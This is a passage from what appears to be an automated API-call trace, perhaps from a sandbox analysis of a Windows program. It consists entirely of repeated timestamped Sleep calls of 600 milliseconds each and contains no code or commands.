(dwMilliseconds=0x258) [0231.975] Sleep (dwMilliseconds=0x258) [0231.991] Sleep (dwMilliseconds=0x258) [0232.010] Sleep (dwMilliseconds=0x258) [0232.069] Sleep (dwMilliseconds=0x258) [0232.117] Sleep (dwMilliseconds=0x258) [0232.135] Sleep (dwMilliseconds=0x258) [0232.160] Sleep (dwMilliseconds=0x258) [0232.162] Sleep (dwMilliseconds=0x258) [0232.181] Sleep (dwMilliseconds=0x258) [0232.194] Sleep (dwMilliseconds=0x258) [0232.209] Sleep (dwMilliseconds=0x258) [0232.271] Sleep (dwMilliseconds=0x258) [0232.318] Sleep (dwMilliseconds=0x258) [0232.355] Sleep (dwMilliseconds=0x258) [0232.365] Sleep (dwMilliseconds=0x258) [0232.380] Sleep (dwMilliseconds=0x258) [0232.396] Sleep (dwMilliseconds=0x258) [0232.412] Sleep (dwMilliseconds=0x258) [0232.428] Sleep (dwMilliseconds=0x258) [0232.490] Sleep (dwMilliseconds=0x258) [0232.536] Sleep (dwMilliseconds=0x258) [0232.555] Sleep (dwMilliseconds=0x258) [0232.567] Sleep (dwMilliseconds=0x258) [0232.583] Sleep (dwMilliseconds=0x258) [0232.599] Sleep (dwMilliseconds=0x258) [0232.614] Sleep (dwMilliseconds=0x258) [0232.631] Sleep (dwMilliseconds=0x258) [0232.756] Sleep (dwMilliseconds=0x258) [0232.802] Sleep (dwMilliseconds=0x258) [0232.824] Sleep (dwMilliseconds=0x258) [0232.833] Sleep (dwMilliseconds=0x258) [0232.849] Sleep (dwMilliseconds=0x258) [0232.865] Sleep (dwMilliseconds=0x258) [0232.879] Sleep (dwMilliseconds=0x258) [0232.895] Sleep (dwMilliseconds=0x258) [0232.959] Sleep (dwMilliseconds=0x258) [0233.010] Sleep (dwMilliseconds=0x258) [0233.037] Sleep (dwMilliseconds=0x258) [0233.051] Sleep (dwMilliseconds=0x258) [0233.068] Sleep (dwMilliseconds=0x258) [0233.082] Sleep (dwMilliseconds=0x258) [0233.098] Sleep (dwMilliseconds=0x258) [0233.114] Sleep (dwMilliseconds=0x258) [0233.177] Sleep (dwMilliseconds=0x258) [0233.232] Sleep (dwMilliseconds=0x258) [0233.260] Sleep (dwMilliseconds=0x258) [0233.269] Sleep (dwMilliseconds=0x258) [0233.287] Sleep (dwMilliseconds=0x258) [0233.302] Sleep (dwMilliseconds=0x258) [0233.316] Sleep (dwMilliseconds=0x258) [0233.332] Sleep (dwMilliseconds=0x258) [0233.395] Sleep (dwMilliseconds=0x258) [0233.442] Sleep (dwMilliseconds=0x258) [0233.468] Sleep (dwMilliseconds=0x258) [0233.475] Sleep (dwMilliseconds=0x258) [0233.488] Sleep (dwMilliseconds=0x258) [0233.506] Sleep (dwMilliseconds=0x258) [0233.519] Sleep (dwMilliseconds=0x258) [0233.543] Sleep (dwMilliseconds=0x258) [0233.550] Sleep (dwMilliseconds=0x258) [0233.614] Sleep (dwMilliseconds=0x258) [0233.660] Sleep (dwMilliseconds=0x258) [0233.687] Sleep (dwMilliseconds=0x258) [0233.691] Sleep (dwMilliseconds=0x258) [0233.728] Sleep (dwMilliseconds=0x258) [0233.738] Sleep (dwMilliseconds=0x258) [0233.753] Sleep (dwMilliseconds=0x258) [0233.769] Sleep (dwMilliseconds=0x258) [0233.832] Sleep (dwMilliseconds=0x258) [0233.878] Sleep (dwMilliseconds=0x258) [0233.898] Sleep (dwMilliseconds=0x258) [0233.910] Sleep (dwMilliseconds=0x258) [0233.925] Sleep (dwMilliseconds=0x258) [0233.942] Sleep (dwMilliseconds=0x258) [0233.956] Sleep (dwMilliseconds=0x258) [0233.972] Sleep (dwMilliseconds=0x258) [0234.034] Sleep (dwMilliseconds=0x258) [0234.081] Sleep (dwMilliseconds=0x258) [0234.101] Sleep (dwMilliseconds=0x258) [0234.112] Sleep (dwMilliseconds=0x258) [0234.128] Sleep (dwMilliseconds=0x258) [0234.143] Sleep (dwMilliseconds=0x258) [0234.160] Sleep (dwMilliseconds=0x258) [0234.174] Sleep (dwMilliseconds=0x258) [0234.224] Sleep (dwMilliseconds=0x258) [0234.269] Sleep (dwMilliseconds=0x258) [0234.313] Sleep (dwMilliseconds=0x258) [0234.315] Sleep (dwMilliseconds=0x258) [0234.331] Sleep (dwMilliseconds=0x258) [0234.346] Sleep (dwMilliseconds=0x258) [0234.373] Sleep (dwMilliseconds=0x258) [0234.377] Sleep (dwMilliseconds=0x258) [0234.439] Sleep (dwMilliseconds=0x258) [0234.487] Sleep (dwMilliseconds=0x258) [0234.510] Sleep (dwMilliseconds=0x258) [0234.517] Sleep (dwMilliseconds=0x258) [0234.533] Sleep (dwMilliseconds=0x258) [0234.549] Sleep (dwMilliseconds=0x258) [0234.564] Sleep (dwMilliseconds=0x258) [0234.582] Sleep (dwMilliseconds=0x258) [0234.642] Sleep (dwMilliseconds=0x258) [0234.692] Sleep (dwMilliseconds=0x258) [0234.770] Sleep (dwMilliseconds=0x258) [0234.783] Sleep (dwMilliseconds=0x258) [0234.800] Sleep (dwMilliseconds=0x258) [0234.814] Sleep (dwMilliseconds=0x258) [0234.830] Sleep (dwMilliseconds=0x258) [0234.892] Sleep (dwMilliseconds=0x258) [0234.939] Sleep (dwMilliseconds=0x258) [0234.983] Sleep (dwMilliseconds=0x258) [0234.986] Sleep (dwMilliseconds=0x258) [0235.001] Sleep (dwMilliseconds=0x258) [0235.017] Sleep (dwMilliseconds=0x258) [0235.034] Sleep (dwMilliseconds=0x258) [0235.049] Sleep (dwMilliseconds=0x258) [0235.110] Sleep (dwMilliseconds=0x258) [0235.158] Sleep (dwMilliseconds=0x258) [0235.176] Sleep (dwMilliseconds=0x258) [0235.189] Sleep (dwMilliseconds=0x258) [0235.204] Sleep (dwMilliseconds=0x258) [0235.219] Sleep (dwMilliseconds=0x258) [0235.235] Sleep (dwMilliseconds=0x258) [0235.251] Sleep (dwMilliseconds=0x258) [0235.329] Sleep (dwMilliseconds=0x258) [0235.378] Sleep (dwMilliseconds=0x258) [0235.411] Sleep (dwMilliseconds=0x258) [0235.422] Sleep (dwMilliseconds=0x258) [0235.438] Sleep (dwMilliseconds=0x258) [0235.454] Sleep (dwMilliseconds=0x258) [0235.469] Sleep (dwMilliseconds=0x258) [0235.487] Sleep (dwMilliseconds=0x258) [0235.547] Sleep (dwMilliseconds=0x258) [0235.596] Sleep (dwMilliseconds=0x258) [0235.623] Sleep (dwMilliseconds=0x258) [0235.625] Sleep (dwMilliseconds=0x258) [0235.641] Sleep (dwMilliseconds=0x258) [0235.656] Sleep (dwMilliseconds=0x258) [0235.672] Sleep (dwMilliseconds=0x258) [0235.688] Sleep (dwMilliseconds=0x258) [0235.766] Sleep (dwMilliseconds=0x258) [0235.813] Sleep (dwMilliseconds=0x258) [0235.852] Sleep (dwMilliseconds=0x258) [0235.859] Sleep (dwMilliseconds=0x258) [0235.876] Sleep (dwMilliseconds=0x258) [0235.890] Sleep (dwMilliseconds=0x258) [0235.906] Sleep (dwMilliseconds=0x258) [0235.922] Sleep (dwMilliseconds=0x258) [0235.984] Sleep (dwMilliseconds=0x258) [0236.032] Sleep (dwMilliseconds=0x258) [0236.060] Sleep (dwMilliseconds=0x258) [0236.062] Sleep (dwMilliseconds=0x258) [0236.077] Sleep (dwMilliseconds=0x258) [0236.093] Sleep (dwMilliseconds=0x258) [0236.112] Sleep (dwMilliseconds=0x258) [0236.125] Sleep (dwMilliseconds=0x258) [0236.140] Sleep (dwMilliseconds=0x258) [0236.202] Sleep (dwMilliseconds=0x258) [0236.249] Sleep (dwMilliseconds=0x258) [0236.269] Sleep (dwMilliseconds=0x258) [0236.280] Sleep (dwMilliseconds=0x258) [0236.297] Sleep (dwMilliseconds=0x258) [0236.322] Sleep (dwMilliseconds=0x258) [0236.327] Sleep (dwMilliseconds=0x258) [0236.345] Sleep (dwMilliseconds=0x258) [0236.405] Sleep (dwMilliseconds=0x258) [0236.461] Sleep (dwMilliseconds=0x258) [0236.468] Sleep (dwMilliseconds=0x258) [0236.483] Sleep (dwMilliseconds=0x258) [0236.499] Sleep (dwMilliseconds=0x258) [0236.514] Sleep (dwMilliseconds=0x258) [0236.530] Sleep (dwMilliseconds=0x258) [0236.546] Sleep (dwMilliseconds=0x258) [0236.610] Sleep (dwMilliseconds=0x258) [0236.655] Sleep (dwMilliseconds=0x258) [0236.693] Sleep (dwMilliseconds=0x258) [0236.724] Sleep (dwMilliseconds=0x258) [0236.733] Sleep (dwMilliseconds=0x258) [0236.749] Sleep (dwMilliseconds=0x258) [0236.764] Sleep (dwMilliseconds=0x258) [0236.826] Sleep (dwMilliseconds=0x258) [0236.874] Sleep (dwMilliseconds=0x258) [0236.906] Sleep (dwMilliseconds=0x258) [0236.920] Sleep (dwMilliseconds=0x258) [0236.936] Sleep (dwMilliseconds=0x258) [0236.951] Sleep (dwMilliseconds=0x258) [0236.967] Sleep (dwMilliseconds=0x258) [0236.983] Sleep (dwMilliseconds=0x258) [0237.060] Sleep (dwMilliseconds=0x258) [0237.107] Sleep (dwMilliseconds=0x258) [0237.131] Sleep (dwMilliseconds=0x258) [0237.138] Sleep (dwMilliseconds=0x258) [0237.154] Sleep (dwMilliseconds=0x258) [0237.170] Sleep (dwMilliseconds=0x258) [0237.186] Sleep (dwMilliseconds=0x258) [0237.201] Sleep (dwMilliseconds=0x258) [0237.216] Sleep (dwMilliseconds=0x258) [0237.279] Sleep (dwMilliseconds=0x258) [0237.344] Sleep (dwMilliseconds=0x258) [0237.363] Sleep (dwMilliseconds=0x258) [0237.372] Sleep (dwMilliseconds=0x258) [0237.389] Sleep (dwMilliseconds=0x258) [0237.404] Sleep (dwMilliseconds=0x258) [0237.419] Sleep (dwMilliseconds=0x258) [0237.435] Sleep (dwMilliseconds=0x258) [0237.497] Sleep (dwMilliseconds=0x258) [0237.544] Sleep (dwMilliseconds=0x258) [0237.566] Sleep (dwMilliseconds=0x258) [0237.575] Sleep (dwMilliseconds=0x258) [0237.591] Sleep (dwMilliseconds=0x258) [0237.607] Sleep (dwMilliseconds=0x258) [0237.622] Sleep (dwMilliseconds=0x258) [0237.638] Sleep (dwMilliseconds=0x258) [0237.731] Sleep (dwMilliseconds=0x258) [0237.779] Sleep (dwMilliseconds=0x258) [0237.803] Sleep (dwMilliseconds=0x258) [0237.809] Sleep (dwMilliseconds=0x258) [0237.825] Sleep (dwMilliseconds=0x258) [0237.842] Sleep (dwMilliseconds=0x258) [0237.856] Sleep (dwMilliseconds=0x258) [0237.872] Sleep (dwMilliseconds=0x258) [0237.935] Sleep (dwMilliseconds=0x258) [0237.981] Sleep (dwMilliseconds=0x258) [0238.007] Sleep (dwMilliseconds=0x258) [0238.012] Sleep (dwMilliseconds=0x258) [0238.028] Sleep (dwMilliseconds=0x258) [0238.043] Sleep (dwMilliseconds=0x258) [0238.059] Sleep (dwMilliseconds=0x258) [0238.075] Sleep (dwMilliseconds=0x258) [0238.137] Sleep (dwMilliseconds=0x258) [0238.184] Sleep (dwMilliseconds=0x258) [0238.211] Sleep (dwMilliseconds=0x258) [0238.215] Sleep (dwMilliseconds=0x258) [0238.230] Sleep (dwMilliseconds=0x258) [0238.278] Sleep (dwMilliseconds=0x258) [0238.294] Sleep (dwMilliseconds=0x258) [0238.355] Sleep (dwMilliseconds=0x258) [0238.410] Sleep (dwMilliseconds=0x258) [0238.434] Sleep (dwMilliseconds=0x258) [0238.449] Sleep (dwMilliseconds=0x258) [0238.464] Sleep (dwMilliseconds=0x258) [0238.480] Sleep (dwMilliseconds=0x258) [0238.495] Sleep (dwMilliseconds=0x258) [0238.513] Sleep (dwMilliseconds=0x258) [0238.558] Sleep (dwMilliseconds=0x258) [0238.605] Sleep (dwMilliseconds=0x258) [0238.652] Sleep (dwMilliseconds=0x258) [0238.667] Sleep (dwMilliseconds=0x258) [0238.683] Sleep (dwMilliseconds=0x258) [0238.720] Sleep (dwMilliseconds=0x258) [0238.778] Sleep (dwMilliseconds=0x258) [0238.823] Sleep (dwMilliseconds=0x258) [0238.866] Sleep (dwMilliseconds=0x258) [0238.870] Sleep (dwMilliseconds=0x258) [0238.887] Sleep (dwMilliseconds=0x258) [0238.901] Sleep (dwMilliseconds=0x258) [0238.917] Sleep (dwMilliseconds=0x258) [0238.932] Sleep (dwMilliseconds=0x258) [0238.996] Sleep (dwMilliseconds=0x258) [0239.041] Sleep (dwMilliseconds=0x258) [0239.081] Sleep (dwMilliseconds=0x258) [0239.088] Sleep (dwMilliseconds=0x258) [0239.105] Sleep (dwMilliseconds=0x258) [0239.120] Sleep (dwMilliseconds=0x258) [0239.135] Sleep (dwMilliseconds=0x258) [0239.151] Sleep (dwMilliseconds=0x258) [0239.214] Sleep (dwMilliseconds=0x258) [0239.263] Sleep (dwMilliseconds=0x258) [0239.298] Sleep (dwMilliseconds=0x258) [0239.314] Sleep (dwMilliseconds=0x258) [0239.325] Sleep (dwMilliseconds=0x258) [0239.338] Sleep (dwMilliseconds=0x258) [0239.353] Sleep (dwMilliseconds=0x258) [0239.370] Sleep (dwMilliseconds=0x258) [0239.431] Sleep (dwMilliseconds=0x258) [0239.479] Sleep (dwMilliseconds=0x258) [0239.540] Sleep (dwMilliseconds=0x258) [0239.541] Sleep (dwMilliseconds=0x258) [0239.556] Sleep (dwMilliseconds=0x258) [0239.572] Sleep (dwMilliseconds=0x258) [0239.590] Sleep (dwMilliseconds=0x258) [0239.652] Sleep (dwMilliseconds=0x258) [0239.713] Sleep (dwMilliseconds=0x258) [0239.734] Sleep (dwMilliseconds=0x258) [0239.743] Sleep (dwMilliseconds=0x258) [0239.761] Sleep (dwMilliseconds=0x258) [0239.775] Sleep (dwMilliseconds=0x258) [0239.790] Sleep (dwMilliseconds=0x258) [0239.806] Sleep (dwMilliseconds=0x258) [0239.869] Sleep (dwMilliseconds=0x258) [0239.915] Sleep (dwMilliseconds=0x258) [0239.934] Sleep (dwMilliseconds=0x258) [0239.948] Sleep (dwMilliseconds=0x258) [0239.963] Sleep (dwMilliseconds=0x258) [0239.981] Sleep (dwMilliseconds=0x258) [0239.993] Sleep (dwMilliseconds=0x258) [0240.009] Sleep (dwMilliseconds=0x258) [0240.071] Sleep (dwMilliseconds=0x258) [0240.118] Sleep (dwMilliseconds=0x258) [0240.152] Sleep (dwMilliseconds=0x258) [0240.165] Sleep (dwMilliseconds=0x258) [0240.180] Sleep (dwMilliseconds=0x258) [0240.197] Sleep (dwMilliseconds=0x258) [0240.212] Sleep (dwMilliseconds=0x258) [0240.228] Sleep (dwMilliseconds=0x258) [0240.274] Sleep (dwMilliseconds=0x258) [0240.323] Sleep (dwMilliseconds=0x258) [0240.363] Sleep (dwMilliseconds=0x258) [0240.368] Sleep (dwMilliseconds=0x258) [0240.383] Sleep (dwMilliseconds=0x258) [0240.399] Sleep (dwMilliseconds=0x258) [0240.416] Sleep (dwMilliseconds=0x258) [0240.430] Sleep (dwMilliseconds=0x258) [0240.446] Sleep (dwMilliseconds=0x258) [0240.508] Sleep (dwMilliseconds=0x258) [0240.571] Sleep (dwMilliseconds=0x258) [0240.598] Sleep (dwMilliseconds=0x258) [0240.601] Sleep (dwMilliseconds=0x258) [0240.617] Sleep (dwMilliseconds=0x258) [0240.634] Sleep (dwMilliseconds=0x258) [0240.648] Sleep (dwMilliseconds=0x258) [0240.664] Sleep (dwMilliseconds=0x258) [0240.744] Sleep (dwMilliseconds=0x258) [0240.789] Sleep (dwMilliseconds=0x258) [0240.853] Sleep (dwMilliseconds=0x258) [0240.867] Sleep (dwMilliseconds=0x258) [0240.882] Sleep (dwMilliseconds=0x258) [0240.898] Sleep (dwMilliseconds=0x258) [0240.962] Sleep (dwMilliseconds=0x258) [0241.007] Sleep (dwMilliseconds=0x258) [0241.046] Sleep (dwMilliseconds=0x258) [0241.054] Sleep (dwMilliseconds=0x258) [0241.071] Sleep (dwMilliseconds=0x258) [0241.085] Sleep (dwMilliseconds=0x258) [0241.101] Sleep (dwMilliseconds=0x258) [0241.116] Sleep (dwMilliseconds=0x258) [0241.164] Sleep (dwMilliseconds=0x258) [0241.210] Sleep (dwMilliseconds=0x258) [0241.269] Sleep (dwMilliseconds=0x258) [0241.272] Sleep (dwMilliseconds=0x258) [0241.288] Sleep (dwMilliseconds=0x258) [0241.306] Sleep (dwMilliseconds=0x258) [0241.319] Sleep (dwMilliseconds=0x258) [0241.335] Sleep (dwMilliseconds=0x258) [0241.397] Sleep (dwMilliseconds=0x258) [0241.445] Sleep (dwMilliseconds=0x258) [0241.459] Sleep (dwMilliseconds=0x258) [0241.475] Sleep (dwMilliseconds=0x258) [0241.491] Sleep (dwMilliseconds=0x258) [0241.506] Sleep (dwMilliseconds=0x258) [0241.530] Sleep (dwMilliseconds=0x258) [0241.541] Sleep (dwMilliseconds=0x258) [0241.611] Sleep (dwMilliseconds=0x258) [0241.664] Sleep (dwMilliseconds=0x258) [0241.742] Sleep (dwMilliseconds=0x258) [0241.756] Sleep (dwMilliseconds=0x258) [0241.773] Sleep (dwMilliseconds=0x258) [0241.834] Sleep (dwMilliseconds=0x258) [0241.898] Sleep (dwMilliseconds=0x258) [0241.926] Sleep (dwMilliseconds=0x258) [0241.928] Sleep (dwMilliseconds=0x258) [0241.943] Sleep (dwMilliseconds=0x258) [0242.006] Sleep (dwMilliseconds=0x258) [0242.068] Sleep (dwMilliseconds=0x258) [0242.088] Sleep (dwMilliseconds=0x258) [0242.099] Sleep (dwMilliseconds=0x258) [0242.162] Sleep (dwMilliseconds=0x258) [0242.183] Sleep (dwMilliseconds=0x258) [0242.242] Sleep (dwMilliseconds=0x258) [0242.255] Sleep (dwMilliseconds=0x258) [0242.271] Sleep (dwMilliseconds=0x258) [0242.333] Sleep (dwMilliseconds=0x258) [0242.396] Sleep (dwMilliseconds=0x258) [0242.417] Sleep (dwMilliseconds=0x258) [0242.434] Sleep (dwMilliseconds=0x258) [0242.442] Sleep (dwMilliseconds=0x258) [0242.505] Sleep (dwMilliseconds=0x258) [0242.568] Sleep (dwMilliseconds=0x258) [0242.585] Sleep (dwMilliseconds=0x258) [0242.598] Sleep (dwMilliseconds=0x258) [0242.614] Sleep (dwMilliseconds=0x258) [0242.677] Sleep (dwMilliseconds=0x258) [0242.739] Sleep (dwMilliseconds=0x258) [0242.766] Sleep (dwMilliseconds=0x258) [0242.770] Sleep (dwMilliseconds=0x258) [0242.832] Sleep (dwMilliseconds=0x258) [0242.856] Sleep (dwMilliseconds=0x258) [0242.896] Sleep (dwMilliseconds=0x258) [0242.917] Sleep (dwMilliseconds=0x258) [0242.926] Sleep (dwMilliseconds=0x258) [0242.941] Sleep (dwMilliseconds=0x258) [0243.005] Sleep (dwMilliseconds=0x258) [0243.066] Sleep (dwMilliseconds=0x258) [0243.082] Sleep (dwMilliseconds=0x258) [0243.098] Sleep (dwMilliseconds=0x258) [0243.145] Sleep (dwMilliseconds=0x258) [0243.180] Sleep (dwMilliseconds=0x258) [0243.238] Sleep (dwMilliseconds=0x258) [0243.263] Sleep (dwMilliseconds=0x258) [0243.269] Sleep (dwMilliseconds=0x258) [0243.333] Sleep (dwMilliseconds=0x258) [0243.354] Sleep (dwMilliseconds=0x258) [0243.410] Sleep (dwMilliseconds=0x258) [0243.427] Sleep (dwMilliseconds=0x258) [0243.441] Sleep (dwMilliseconds=0x258) [0243.503] Sleep (dwMilliseconds=0x258) [0243.566] Sleep (dwMilliseconds=0x258) [0243.581] Sleep (dwMilliseconds=0x258) [0243.601] Sleep (dwMilliseconds=0x258) [0243.659] Sleep (dwMilliseconds=0x258) [0243.737] Sleep (dwMilliseconds=0x258) [0243.756] Sleep (dwMilliseconds=0x258) [0243.769] Sleep (dwMilliseconds=0x258) [0243.831] Sleep (dwMilliseconds=0x258) [0243.856] Sleep (dwMilliseconds=0x258) [0243.909] Sleep (dwMilliseconds=0x258) [0243.924] Sleep (dwMilliseconds=0x258) [0243.940] Sleep (dwMilliseconds=0x258) [0244.003] Sleep (dwMilliseconds=0x258) [0244.065] Sleep (dwMilliseconds=0x258) [0244.087] Sleep (dwMilliseconds=0x258) [0244.096] Sleep (dwMilliseconds=0x258) [0244.158] Sleep (dwMilliseconds=0x258) [0244.181] Sleep (dwMilliseconds=0x258) [0244.237] Sleep (dwMilliseconds=0x258) [0244.272] Sleep (dwMilliseconds=0x258) [0244.330] Sleep (dwMilliseconds=0x258) [0244.352] Sleep (dwMilliseconds=0x258) [0244.361] Sleep (dwMilliseconds=0x258) [0244.424] Sleep (dwMilliseconds=0x258) [0244.443] Sleep (dwMilliseconds=0x258) [0244.501] Sleep (dwMilliseconds=0x258) [0244.522] Sleep (dwMilliseconds=0x258) [0244.533] Sleep (dwMilliseconds=0x258) [0244.595] Sleep (dwMilliseconds=0x258) [0244.634] Sleep (dwMilliseconds=0x258) [0244.675] Sleep (dwMilliseconds=0x258) [0244.697] Sleep (dwMilliseconds=0x258) [0244.767] Sleep (dwMilliseconds=0x258) [0244.783] Sleep (dwMilliseconds=0x258) [0244.845] Sleep (dwMilliseconds=0x258) [0244.866] Sleep (dwMilliseconds=0x258) [0244.909] Sleep (dwMilliseconds=0x258) [0244.943] Sleep (dwMilliseconds=0x258) [0245.001] Sleep (dwMilliseconds=0x258) [0245.017] Sleep (dwMilliseconds=0x258) [0245.032] Sleep (dwMilliseconds=0x258) [0245.094] Sleep (dwMilliseconds=0x258) [0245.157] Sleep (dwMilliseconds=0x258) [0245.172] Sleep (dwMilliseconds=0x258) [0245.189] Sleep (dwMilliseconds=0x258) [0245.250] Sleep (dwMilliseconds=0x258) [0245.313] Sleep (dwMilliseconds=0x258) [0245.328] Sleep (dwMilliseconds=0x258) [0245.344] Sleep (dwMilliseconds=0x258) [0245.407] Sleep (dwMilliseconds=0x258) [0245.469] Sleep (dwMilliseconds=0x258) [0245.490] Sleep (dwMilliseconds=0x258) [0245.500] Sleep (dwMilliseconds=0x258) [0245.516] Sleep (dwMilliseconds=0x258) [0245.578] Sleep (dwMilliseconds=0x258) [0245.641] Sleep (dwMilliseconds=0x258) [0245.667] Sleep (dwMilliseconds=0x258) [0245.671] Sleep (dwMilliseconds=0x258) [0245.750] Sleep (dwMilliseconds=0x258) [0245.812] Sleep (dwMilliseconds=0x258) [0245.827] Sleep (dwMilliseconds=0x258) [0245.844] Sleep (dwMilliseconds=0x258) [0245.859] Sleep (dwMilliseconds=0x258) [0245.921] Sleep (dwMilliseconds=0x258) [0245.969] Sleep (dwMilliseconds=0x258) [0245.984] Sleep (dwMilliseconds=0x258) [0245.999] Sleep (dwMilliseconds=0x258) [0246.015] Sleep (dwMilliseconds=0x258) [0246.031] Sleep (dwMilliseconds=0x258) [0246.046] Sleep (dwMilliseconds=0x258) [0246.062] Sleep (dwMilliseconds=0x258) [0246.125] Sleep (dwMilliseconds=0x258) [0246.171] Sleep (dwMilliseconds=0x258) [0246.191] Sleep (dwMilliseconds=0x258) [0246.202] Sleep (dwMilliseconds=0x258) [0246.218] Sleep (dwMilliseconds=0x258) [0246.233] Sleep (dwMilliseconds=0x258) [0246.249] Sleep (dwMilliseconds=0x258) [0246.264] Sleep (dwMilliseconds=0x258) [0246.327] Sleep (dwMilliseconds=0x258) [0246.373] Sleep (dwMilliseconds=0x258) [0246.390] Sleep (dwMilliseconds=0x258) [0246.405] Sleep (dwMilliseconds=0x258) [0246.424] Sleep (dwMilliseconds=0x258) [0246.437] Sleep (dwMilliseconds=0x258) [0246.451] Sleep (dwMilliseconds=0x258) [0246.467] Sleep (dwMilliseconds=0x258) [0246.530] Sleep (dwMilliseconds=0x258) [0246.576] Sleep (dwMilliseconds=0x258) [0246.592] Sleep (dwMilliseconds=0x258) [0246.608] Sleep (dwMilliseconds=0x258) [0246.634] Sleep (dwMilliseconds=0x258) [0246.639] Sleep (dwMilliseconds=0x258) [0246.654] Sleep (dwMilliseconds=0x258) [0246.673] Sleep (dwMilliseconds=0x258) [0246.749] Sleep (dwMilliseconds=0x258) [0246.795] Sleep (dwMilliseconds=0x258) [0246.830] Sleep (dwMilliseconds=0x258) [0246.842] Sleep (dwMilliseconds=0x258) [0246.858] Sleep (dwMilliseconds=0x258) [0246.875] Sleep (dwMilliseconds=0x258) [0246.888] Sleep (dwMilliseconds=0x258) [0246.904] Sleep (dwMilliseconds=0x258) [0246.967] Sleep (dwMilliseconds=0x258) [0247.013] Sleep (dwMilliseconds=0x258) [0247.041] Sleep (dwMilliseconds=0x258) [0247.044] Sleep (dwMilliseconds=0x258) [0247.060] Sleep (dwMilliseconds=0x258) [0247.077] Sleep (dwMilliseconds=0x258) [0247.091] Sleep (dwMilliseconds=0x258) [0247.107] Sleep (dwMilliseconds=0x258) [0247.169] Sleep (dwMilliseconds=0x258) [0247.216] Sleep (dwMilliseconds=0x258) [0247.235] Sleep (dwMilliseconds=0x258) [0247.249] Sleep (dwMilliseconds=0x258) [0247.263] Sleep (dwMilliseconds=0x258) [0247.280] Sleep (dwMilliseconds=0x258) [0247.297] Sleep (dwMilliseconds=0x258) [0247.310] Sleep (dwMilliseconds=0x258) [0247.372] Sleep (dwMilliseconds=0x258) [0247.419] Sleep (dwMilliseconds=0x258) [0247.443] Sleep (dwMilliseconds=0x258) [0247.450] Sleep (dwMilliseconds=0x258) [0247.466] Sleep (dwMilliseconds=0x258) [0247.481] Sleep (dwMilliseconds=0x258) [0247.497] Sleep (dwMilliseconds=0x258) [0247.513] Sleep (dwMilliseconds=0x258) [0247.576] Sleep (dwMilliseconds=0x258) [0247.622] Sleep (dwMilliseconds=0x258) [0247.637] Sleep (dwMilliseconds=0x258) [0247.653] Sleep (dwMilliseconds=0x258) [0247.668] Sleep (dwMilliseconds=0x258) [0247.689] Sleep (dwMilliseconds=0x258) [0247.723] Sleep (dwMilliseconds=0x258) [0247.778] Sleep (dwMilliseconds=0x258) [0247.825] Sleep (dwMilliseconds=0x258) [0247.845] Sleep (dwMilliseconds=0x258) [0247.856] Sleep (dwMilliseconds=0x258) [0247.871] Sleep (dwMilliseconds=0x258) [0247.887] Sleep (dwMilliseconds=0x258) [0247.902] Sleep (dwMilliseconds=0x258) [0247.918] Sleep (dwMilliseconds=0x258) [0247.980] Sleep (dwMilliseconds=0x258) [0248.027] Sleep (dwMilliseconds=0x258) [0248.059] Sleep (dwMilliseconds=0x258) [0248.074] Sleep (dwMilliseconds=0x258) [0248.090] Sleep (dwMilliseconds=0x258) [0248.105] Sleep (dwMilliseconds=0x258) [0248.121] Sleep (dwMilliseconds=0x258) [0248.136] Sleep (dwMilliseconds=0x258) [0248.199] Sleep (dwMilliseconds=0x258) [0248.246] Sleep (dwMilliseconds=0x258) [0248.278] Sleep (dwMilliseconds=0x258) [0248.292] Sleep (dwMilliseconds=0x258) [0248.309] Sleep (dwMilliseconds=0x258) [0248.324] Sleep (dwMilliseconds=0x258) [0248.340] Sleep (dwMilliseconds=0x258) [0248.355] Sleep (dwMilliseconds=0x258) [0248.417] Sleep (dwMilliseconds=0x258) [0248.464] Sleep (dwMilliseconds=0x258) [0248.481] Sleep (dwMilliseconds=0x258) [0248.495] Sleep (dwMilliseconds=0x258) [0248.511] Sleep (dwMilliseconds=0x258) [0248.527] Sleep (dwMilliseconds=0x258) [0248.542] Sleep (dwMilliseconds=0x258) [0248.558] Sleep (dwMilliseconds=0x258) [0248.620] Sleep (dwMilliseconds=0x258) [0248.653] Sleep (dwMilliseconds=0x258) [0248.686] Sleep (dwMilliseconds=0x258) [0248.722] Sleep (dwMilliseconds=0x258) [0248.729] Sleep (dwMilliseconds=0x258) [0248.745] Sleep (dwMilliseconds=0x258) [0248.807] Sleep (dwMilliseconds=0x258) [0248.854] Sleep (dwMilliseconds=0x258) [0248.890] Sleep (dwMilliseconds=0x258) [0248.901] Sleep (dwMilliseconds=0x258) [0248.916] Sleep (dwMilliseconds=0x258) [0248.932] Sleep (dwMilliseconds=0x258) [0248.948] Sleep (dwMilliseconds=0x258) [0248.963] Sleep (dwMilliseconds=0x258) [0249.026] Sleep (dwMilliseconds=0x258) [0249.073] Sleep (dwMilliseconds=0x258) [0249.100] Sleep (dwMilliseconds=0x258) [0249.103] Sleep (dwMilliseconds=0x258) [0249.119] Sleep (dwMilliseconds=0x258) [0249.135] Sleep (dwMilliseconds=0x258) [0249.150] Sleep (dwMilliseconds=0x258) [0249.166] Sleep (dwMilliseconds=0x258) [0249.183] Sleep (dwMilliseconds=0x258) [0249.244] Sleep (dwMilliseconds=0x258) [0249.291] Sleep (dwMilliseconds=0x258) [0249.311] Sleep (dwMilliseconds=0x258) [0249.322] Sleep (dwMilliseconds=0x258) [0249.338] Sleep (dwMilliseconds=0x258) [0249.354] Sleep (dwMilliseconds=0x258) [0249.369] Sleep (dwMilliseconds=0x258) [0249.384] Sleep (dwMilliseconds=0x258) [0249.447] Sleep (dwMilliseconds=0x258) [0249.494] Sleep (dwMilliseconds=0x258) [0249.509] Sleep (dwMilliseconds=0x258) [0249.525] Sleep (dwMilliseconds=0x258) [0249.540] Sleep (dwMilliseconds=0x258) [0249.556] Sleep (dwMilliseconds=0x258) [0249.572] Sleep (dwMilliseconds=0x258) [0249.587] Sleep (dwMilliseconds=0x258) [0249.650] Sleep (dwMilliseconds=0x258) [0249.720] Sleep (dwMilliseconds=0x258) [0249.742] Sleep (dwMilliseconds=0x258) [0249.743] Sleep (dwMilliseconds=0x258) [0249.759] Sleep (dwMilliseconds=0x258) [0249.774] Sleep (dwMilliseconds=0x258) [0249.790] Sleep (dwMilliseconds=0x258) [0249.806] Sleep (dwMilliseconds=0x258) [0249.822] Sleep (dwMilliseconds=0x258) [0249.884] Sleep (dwMilliseconds=0x258) [0249.931] Sleep (dwMilliseconds=0x258) [0249.969] Sleep (dwMilliseconds=0x258) [0249.977] Sleep (dwMilliseconds=0x258) [0249.993] Sleep (dwMilliseconds=0x258) [0250.008] 